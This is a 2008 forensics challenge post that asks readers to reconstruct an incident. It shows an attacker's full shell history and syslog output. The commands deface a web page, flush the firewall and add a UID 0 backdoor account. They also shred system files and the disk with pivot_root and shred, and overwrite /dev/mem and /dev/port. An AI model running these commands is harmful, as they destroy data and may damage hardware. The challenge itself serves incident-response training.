It Happened One Friday

| March 21, 2008

server2.gifOverview: Hello, challenge fans. Matt Carpenter and I have brewed up a new one for your analysis. The evidence is below. Analyze it and answer our questions. As always, we’ll choose three winners: one technical champ, one creative victor whose answer is technically correct, and one lucky person chosen at random. As you work through this challenge, please observe this very important warning! As they say on TV, DO NOT TRY THIS AT HOME. We’ll go even further by saying, DO NOT TRY IT AT WORK EITHER. The commands included in this challenge are _highly_ destructive, and some of them are hardware specific. They will hose a machine badly. If you insist on testing the commands, at least use a strongly virtualized environment that isolates virtual hardware from physical hardware, and set a snapshot before each command so that you can revert to a pristine state. We wrote the challenge using VMware Workstation, and did not suffer damage to our underlying hosts. However, we cannot guarantee that your VMware experience will match our own. In other words, to borrow from the TV vernacular yet again, YOUR MILEAGE MAY VARY. Furthermore, some so-called "virtualized environments" other than VMware are merely emulators that do not isolate hardware well, nor do they support snapshots. The commands below could damage such environments, so be very careful. You have been warned!

If you can’t answer this challenge 100%, still send something in to qualify as a random winner. This month’s prize is my book, Malware: Fighting Malicious Code, which I authored with Lenny Zeltser. Each winner gets a signed copy.

–Ed Skoudis, Intelguardians
Author, Counter Hack Reloaded

Active Image Active Image del.icio.us SlashdotSlashdot It!

Discuss in Forums {mos_smf_discuss:March 2008 – It Happened One Friday}


chicagocon2008s_468x120.jpg
ChicagoCon 2008s

It Happened One Friday

By Matt Carpenter and Ed Skoudis

id
unname -a
uname -a
touch /root/test
ls -la /root
rm /root/test
vi /etc/shadow
iptables -F
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -I OUTPUT -m state –state ESTABLISHED,RELATED -j ACCEPT
rm /var/www/htdocs/index.html
echo "I’m so pwned…." > /var/www/htdocs/index.html
echo JiMxNDk3OyYjMTUxMzsmIzE0OTM7JiMxNTA2OyAmIzE0OTI7JiMxNTA0OyYjMTUxMDsmIzE1MTI7 >>
/var/www/htdocs/index.html
echo JiMxNDk3OyAmIzE0OTM7JiMxNTAyOyYjMTUwMDsmIzE0OTg7ICYjMTQ5MjsmIzE0OTc7JiMxNDky >>
/var/www/htdocs/index.html
echo OyYjMTQ5MzsmIzE0OTE7JiMxNDk3OyYjMTUwMTs= >> /var/www/htdocs/index.html
wget http://localhost/
chmod 666 /var/www/htdocs/index.html
wget http://localhost/
mail -s "S0 pwned!" `nc -l -p 54742` < /var/www/htdocs/index.html
mke2fs -m 0 /dev/ram9
mke2fs -m 0 /dev/ram8
mke2fs -m 0 /dev/ram7
mkdir -p /mnt/rd
mount /dev/ram9 /mnt/rd
mkdir /mnt/rd/usr
mount /dev/ram8 /mnt/rd/usr
mkdir /mnt/rd/lib
mount /dev/ram7 /mnt/rd/lib
mkdir -p /mnt/rd/var/www/htdocs
mkdir -p /mnt/rd/proc
mkdir -p /mnt/rd/dev
mkdir -p /mnt/rd/tmp
cp -ax /var/www/htdocs/index.html /mnt/rd/var/www/htdocs/
vi /tmp/flist.txt
cat /tmp/flist.txt | while read file; do dir=`echo "$file" |sed ‘s//[^/]*$//’` ; mkdir
-p /mnt/rd/$dir ; cp -ax $file /mnt/rd/$dir; done
mount –bind /proc /mnt/rd/proc
mount –bind /dev /mnt/rd/dev
mkdir /mnt/rd/oldroot
cd /mnt/rd
pivot_root . oldroot
exec chroot .
cd
cat /etc/shells
chsh -s /bin/sh
shred -u /oldroot/bin/bash
shred -u /oldroot/etc/shadow
find /oldroot/root -type f -ls -exec shred -u {} ;
find /oldroot/home -type f -ls -exec shred -u {} ;
find /oldroot/usr/[a-km-z]* -type f -ls -exec shred -u {} ;
find /oldroot/usr/lib/[a-hj-z]* -type f -ls -exec shred -u {} ;
find /oldroot/var -type f -ls -exec shred -u {} ;
find /oldroot/etc -type f -ls -exec shred -u {} ;
mount
cat /proc/partitions
dumpe2fs -b /dev/sda2
count=1; while [ $count -lt 1000 ]; do echo $count; count=`expr $count + 1`; done >>
/tmp/bad1000
mkdir /tmp
count=1; while [ $count -lt 1000 ]; do echo $count; count=`expr $count + 1`; done >>
/tmp/bad1000
e2fsck -l /tmp/bad1000 /dev/sda2
dumpe2fs -b /dev/sda2
echo "dirty" > /tmp/dirty
debugfs –help
man debugfs
which man
fsck you
debugfs -w -f /tmp/dirty /dev/sda2
ll
ls -la
dmidecode |head 50
dd if=/dev/mem bs=1 skip=946272 count=512 |hexdump -C
dd if=/dev/mem bs=1 skip=1048400 count=176 |hexdump -C
dd if=/dev/zero of=/dev/mem seek=983040 count=65535 bs=1
dd if=/dev/zero of=/dev/mem seek=946272 count=102304 bs=1
printf "x44x44x44x44" |dd of=/dev/port seek=3324 bs=1
printf "x80" | dd of=/dev/port seek=178 bs=1
shred /dev/sda
logger Dodge This
dd if=/dev/zero of=/dev/mem
Mar 20 05:10:52 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 20 05:41:10 242.229.249.233 syslogd 1.4.1#21ubuntu3: restart.
Mar 20 05:35:00 242.229.249.233 sshd[7564]: Accepted password for owner from
228.229.228.233 port 44156 ssh2
Mar 20 05:35:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for
user owner by (uid=0)
Mar 20 05:30:34 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ;
USER=root ; COMMAND=/usr/bin/vi /etc/inetd.conf
Mar 20 05:30:54 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ;
USER=root ; COMMAND=/etc/init.d/openbsd-inetd stop
Mar 20 05:30:56 242.229.249.233 sudo: owner : TTY=pts/10 ; PWD=/home/owner ;
USER=root ; COMMAND=/etc/init.d/openbsd-inetd start
Mar 20 05:33:14 242.229.249.233 telnetd[1803]: connect from 228.229.228.233
Mar 20 05:34:24 242.229.249.233 telnetd[6887]: ttloop: retrying
Mar 20 05:34:45 242.229.249.233 su[6913]: Successful su for root by owner
Mar 20 05:34:45 242.229.249.233 su[6913]: + pts/10 owner:root
Mar 20 05:34:45 242.229.249.233 su[6913]: pam_unix(su:session): session opened for user
root by owner(uid=1000)
Mar 20 05:35:29 242.229.249.233 telnetd[6887]: child process 6888 exited: 0
Mar 20 05:35:29 242.229.249.233 login[6888]: pam_unix(login:session): session closed for
user owner
Mar 20 06:03:14 242.229.249.233 telnetd[1803]: connect from 240.232.249.228
Mar 20 06:04:24 242.229.249.233 telnetd[6887]: ttloop: retrying
Mar 20 06:04:45 242.229.249.233 su[6913]: Successful su for root by owner
Mar 20 06:04:45 242.229.249.233 su[6913]: + pts/10 owner:root
Mar 20 06:04:45 242.229.249.233 su[6913]: pam_unix(su:session): session opened for user
root by owner(uid=1000)
Mar 20 06:04:57 242.229.249.233 useradd[6927]: new user: name=luz, UID=0, GID=0,
home=/home/luz, shell=/bin/bash
Mar 20 06:05:21 242.229.249.233 passwd[6933]: pam_unix(passwd:chauthtok): password
changed for luz
Mar 20 06:05:23 242.229.249.233 su[6913]: pam_unix(su:session): session closed for user
root
Mar 20 06:05:29 242.229.249.233 telnetd[6887]: child process 6888 exited: 0
Mar 20 06:05:29 242.229.249.233 login[6888]: pam_unix(login:session): session closed for
user owner
Mar 20 06:06:00 242.229.249.233 sshd[7564]: Accepted password for owner from
240.232.249.228 port 44156 ssh2
Mar 20 06:06:01 242.229.249.233 sshd[7566]: pam_unix(ssh:session): session opened for
user luz by (uid=0)
Mar 20 06:27:28 242.229.249.233 postfix/pickup[6046]: 54E38488E8: uid=0 from=<root>
Mar 20 06:27:28 242.229.249.233 postfix/cleanup[6208]: 54E38488E8: message-
id=<20080317113539.54E38488E8@humanoid>
Mar 20 06:27:28 242.229.249.233 postfix/qmgr[6047]: 54E38488E8:
from=<luz>, size=385, nrcpt=2 (queue active)
Mar 20 06:27:51 242.229.249.233 chsh[11491]: changed user `luz’ shell to `/bin/sh’
Mar 20 13:24:16 192.168.255.133 CRON[5703]: Authentication service cannot retrieve
authentication info.
Mar 21 05:10:52 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 21 13:02:43 242.229.249.233 luz: Dodge This
Mar 22 05:10:53 johnboy syslogd 1.4.1#17ubuntu7.1: restart (remote reception).
Mar 23 03:31:15 242.229.249.233 syslogd 1.4.1#17ubuntu7: restart.
Mar 23 03:31:16 242.229.249.233 kernel: Inspecting /boot/System.map-2.6.15-27-386
Mar 23 03:31:17 242.229.249.233 kernel: Loaded 23031 symbols from /boot/System.map-
2.6.15-27-386.
Mar 23 03:31:17 242.229.249.233 kernel: Symbols match kernel version 2.6.15.
Mar 23 03:31:17 242.229.249.233 kernel: No module symbols loaded – kernel modules not
enabled.
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] Linux version 2.6.15-27-386
(buildd@terranova) (gcc version 4.0.3 (Ubuntu 4.0.3-1ubuntu5)) #1 PREEMPT Sat Sep 16
01:51:59 UTC 2006
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] BIOS-provided physical RAM map:
Mar 23 03:31:17 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 0000000000000000 –
000000000009f800 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000009f800 –
00000000000a0000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000000ca000 –
00000000000cc000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000000dc000 –
0000000000100000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 0000000000100000 –
000000000fef0000 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000fef0000 –
000000000fefc000 (ACPI data)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000fefc000 –
000000000ff00000 (ACPI NVS)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 000000000ff00000 –
0000000010000000 (usable)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fec00000 –
00000000fec10000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fee00000 –
00000000fee01000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] BIOS-e820: 00000000fffe0000 –
0000000100000000 (reserved)
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] 0MB HIGHMEM available.
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] 256MB LOWMEM available.
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] found SMP MP-table at 000f6ce0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] On node 0 totalpages: 65536
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMA zone: 4096 pages, LIFO
batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMA32 zone: 0 pages, LIFO
batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] Normal zone: 61440 pages,
LIFO batch:15
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] HighMem zone: 0 pages, LIFO
batch:0
Mar 23 03:31:18 242.229.249.233 kernel: [17179569.184000] DMI present.
Mar 23 03:31:20 242.229.249.233 kernel: [17179700.268000] apm: BIOS version 1.2 Flags
0x03 (Driver version 1.16ac)
Mar 23 03:31:20 242.229.249.233 kernel: [17179700.272000] apm: overridden by ACPI.
Mar 23 03:31:29 242.229.249.233 sshd[4030]: Server listening on :: port 22.
Mar 23 03:31:31 242.229.249.233 anacron[4131]: Anacron 2.3 started on 2008-03-23
Mar 23 03:31:33 242.229.249.233 anacron[4131]: Normal exit (0 jobs run)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4156]: (CRON) INFO (pidfile fd = 3)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4157]: (CRON) STARTUP (fork ok)
Mar 23 03:31:33 242.229.249.233 /usr/sbin/cron[4157]: (CRON) INFO (Running @reboot jobs)
  

Question:

1) What happened… and why?

Submit your answers to skillz0308@ethicalhacker.net with the subject line "Skillz Submission" by Sunday April 20, 2008 for a chance to win an autographed copy of my book, Malware: Fighting Malicious Code.  The autograph will congratulate you on your prowess in mastering this challenge!  We’ll choose three winners, as usual, one in each of the three following categories:

– Best Technical Answer

– Best Creative Answer (that is also technically correct)

– Random Draw (Anyone can win, so send in a response even if you have no faith in your ability to win)

Ed Skoudis
Author, Counter Hack Reloaded
SANS Institute Fellow
Co-founder, Intelguardians

Category: Skillz

Comments are closed.